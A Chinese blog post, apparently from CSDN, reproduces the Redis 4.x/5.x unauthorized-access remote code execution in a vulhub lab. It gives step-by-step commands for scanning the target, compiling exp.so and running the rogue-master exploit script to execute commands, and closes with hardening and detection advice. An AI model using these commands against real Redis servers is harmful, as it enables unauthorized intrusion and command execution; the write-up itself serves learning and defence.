Redis未授权访问漏洞复现

最新推荐文章于 2024-08-05 21:22:29 发布
最新推荐文章于 2024-08-05 21:22:29 发布
阅读量1.4k 收藏 5
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q943111495/article/details/121032255
版权

#Redis未授权访问漏洞#

一、漏洞简介

redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。

Redis未授权访问在4.x/5.0.5以前版本下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。

二、漏洞影响

影响版本

Redis 4.x/5.0.5以前版本

三、产生原因

在Redis4.X之后,通过对外部进行拓展,可以实现在redis中实现一个新的Redis命令,通过C语言并且编译出.so文件,在Redis的通信中并知识明文的表达方式,中间参杂了许多的混杂的内容,例如输入命令

get christa

其抓到的内容为

在这里插入图片描述

该传输格式借用成员Pavel Toporkov的图来看可以分为三大块

在这里插入图片描述

*<number> : 参数的个数

$<number>:参数的长度

<parameter>:参数

因此,其返回的包也是一个道理

在这里插入图片描述

在这里插入图片描述

因为Redis主要是基于TCP进行连接,因此我们可以借助主从模式的特性发送一个基于从模式的命令流,向攻击机发送一个命令流slave的命令流,然后攻击机伪造成一个主从的机器向目标机器发送Redis的特定的数据流将恶意文件exp.so保存到当地文件文件上面,在通过module加载该so文件,之后取消主从模式,将当前的命令模块保存到本地并以.rdb后缀命名,最终使用命令system.exec 执行命令。

四、复现过程

docker 靶机:192.168.111.137

攻击机 kali:192.168.111.139

靶场环境:redis:4.0.14

docker搭建靶场环境

docker-compose up -d
docker-compose ps

在这里插入图片描述

可以看到redis启动在6379端口

攻击机安装redis,依次执行以下命令

wget http://download.redis.io/releases/redis-2.8.12.tar.gz 
tar -xzf redis-2.8.12.tar.gz
cd redis-2.8.12
make
cd src
./redis-cli -h

出现帮助信息,安装成功

在这里插入图片描述

nmap扫描靶机

nmap -sV --open -p- 192.168.111.137

在这里插入图片描述

发现6379端口开启

用攻击机redis连接目标机redis

cd redis-2.8.12/src/
./redis-cli -h 192.168.111.137

连接成功,info查看信息

在这里插入图片描述

下载exp

git clone https://github.com/vulhub/redis-rogue-getshell.git

进入该目录下

cd redis-rogue-getshell/RedisModulesSDK/exp
make //在当前目录下生成一个exp.so文件

回到redis-rogue-getshell目录下,利用EXP

./redis-master.py -r 192.168.111.137 -p 6379 -L 192.168.111.139 -P 1111 -f RedisModulesSDK/exp/exp.so -c "id"  //第一个ip是靶机,第二个ip是攻击机

利用成功

在这里插入图片描述

由于实验环境为vulhub,只能通过该exp来getshell,如果想通过写文件、ssh key或定时计划来getshell,会提示没有权限。可参考以下文章自行搭建环境进行复现。

https://www.cnblogs.com/Xy–1/p/12230858.html

https://blog.csdn.net/Jiajiajiang_/article/details/81368212

五、修复方案

  1. 禁止绑定公网(本地缓存)

    redis.conf: bind 127.0.0.1 //redis本来就是作为内存数据库,只要监听在本机即可

  2. 密码验证

    配置认证,也就是AUTH,设置密码,密码会以明文方式保存在Redis配置文件中

  3. 降权运行

    禁止使用 root 权限启动 redis 服务

     vim /etc/redis/redis.conf
 # By default Redis does not run as a daemon. Use 'yes' if you need it.
 # Note that Redis will write a pid file in /var/run/redis.pid when daemonized.
 daemonize yes

    在降权(deamon)模式下,更改配置文件路径是不允许的,即"config set dir /root/.ssh/"执行失败,从而避免了写任意文件的风险

  4. 其他

    • 限定可以连接Redis服务器的IP
    • 修改Redis默认端口6379
    • 配置rename-command配置项"RENAME_CONFIG",这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度

  5. 禁止从redis写入主模式redis传输的文件

     slave-read-only yes

  6. 自动化检测方案

    1. 从running进程redis-server中获取启动参数中的配置文件路径。如果获取失败则从默认路径: /etc/redis/redis.conf

    2. 检查配置key-value对

       daemonize yes
 bind 127.0.0.1

六、参考链接

Redis 4.x/5.x RCE浅析

redis未授权复现-vulhub-exp

Redis未授权访问漏洞分析

标签

CVE-2017-18349、FastJson、反序列化、命令执行

又菜又爱倒腾
关注
专栏目录
Redis授权访问漏洞简单复现
m0_48867141的博客
03-22 3907
1.Redis简介 Redis是一个开源的,可持久化的日志型,Key-Value数据库。 2.漏洞简介 Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访...
redis授权访问漏洞复现
findou
04-09 457
Redis是一个开源的key-value内存中的数据结构存储系统,可以用作缓存,或数据库,redis因为配置不当可以导致授权访问redis的默认端口是6379,并且redis默认配置没有密码认证,如果reids服务暴露在公网上会导致攻击者在授权的情况下访问redis。如果redis以root身份运行,攻击者可以给root账号写入ssh公钥文件,通过ssh登录目标主机。下面是redis授权访...
redis授权访问检测脚本.py
02-11
python编写的redis授权访问漏洞检测脚本
授权访问漏洞复现~~~】
最新发布
m0_59151303的博客
08-05 1145
步骤二:可使用Nmap扫描该端口是否开启服务,还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测…步骤二:如果存在授权访问漏洞则直接访问 http://IP:8888会直接跳到web管理界面,不需要输入密码。步骤二:ActiveMQ默认使用8161端口,默认用户名和密码是 admin/admin,在打开的页面输入…步骤二:在打开的URL中…步骤一:使用以下Fofa语法搜索使用Idap服务的产品.…步骤一:在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场!
Redis授权访问漏洞复现(三种方式)
weixin_55843787的博客
03-29 9598
redis授权访问漏洞
Redis授权访问漏洞搭建复现
m0_58595840的博客
01-05 2805
Redis授权访问漏洞利用方式总结(含靶场搭建)
漏洞复现 - - - 授权访问漏洞Redis
weixin_67503304的博客
08-13 5048
授权访问漏洞Redis, 通过redis数据备份功能,往WEB网站根目录写入一句话木马,利用shell得到WEB网站权限,通过定时任务反弹Shell,写SSH公钥,实现免密登录linux服务器
漏洞复现Redis授权访问
m0_56190544的博客
09-13 2542
本文详细介绍了redis授权访问漏洞的原理以及利用方法,供大家参考学习
Redis授权访问漏洞复现(www.hetianlab.com)
懂进攻知防守
07-19 1155
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
redis授权访问漏洞复现
qq_46343633的博客
01-19 2237
Redis 全称 Remote DictionaryServer(即远程字典服务),它是一个基于内存(当然也可以把其存储至硬盘上,这也是写shell的必要条件之一)实现的键值型非关系(NoSQL)数据库。Redis 免费开源,其最新稳定版本是 6.2.x(2022/11/10)。常用版本包括3.0、4.0、5.0。自 Redis 诞生以来,它以其超高的性能、完美的文档和简洁易懂的源码广受好评,国内外很多大型互联网公司都在使用 Redis,比如腾讯、阿里、Twitter、Github 等等。
redis授权访问漏洞【vulhub靶场】复现
m0_55854679的博客
08-01 859
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上;如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹
Redis授权访问漏洞
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值